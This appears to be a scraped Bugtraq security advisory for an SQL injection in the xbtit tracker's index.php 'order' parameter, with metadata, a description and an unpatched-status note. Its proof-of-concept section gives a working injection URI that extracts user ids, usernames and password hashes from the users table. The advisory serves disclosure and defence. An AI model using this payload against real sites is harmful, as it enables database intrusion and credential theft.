xbtit 'index.php' SQL Injection Vulnerability
BID:39074
Info
xbtit 'index.php' SQL Injection Vulnerability
| Bugtraq ID: | 39074 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 13 2010 12:00AM |
| Updated: | Mar 13 2010 12:00AM |
| Credit: | Ctacok |
| Vulnerable: |
BtiTeam xbtit 0 |
| Not Vulnerable: | |
Discussion
xbtit 'index.php' SQL Injection Vulnerability
xbtit is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
xbtit is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
xbtit 'index.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?page=users&order=flag+or(1,1)=(select+count(0),concat((select+concat(0x3a3a3a,id,0x3a,username,0x3a,password,0x3a3a3a)+from+xbtit_users+limit+1,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)--++&by=ASC
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?page=users&order=flag+or(1,1)=(select+count(0),concat((select+concat(0x3a3a3a,id,0x3a,username,0x3a,password,0x3a3a3a)+from+xbtit_users+limit+1,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)--++&by=ASC
Solution / Fix
xbtit 'index.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
xbtit 'index.php' SQL Injection Vulnerability
References:
References:
- xbtit SQL Injection Vulnerability (BtiTeam)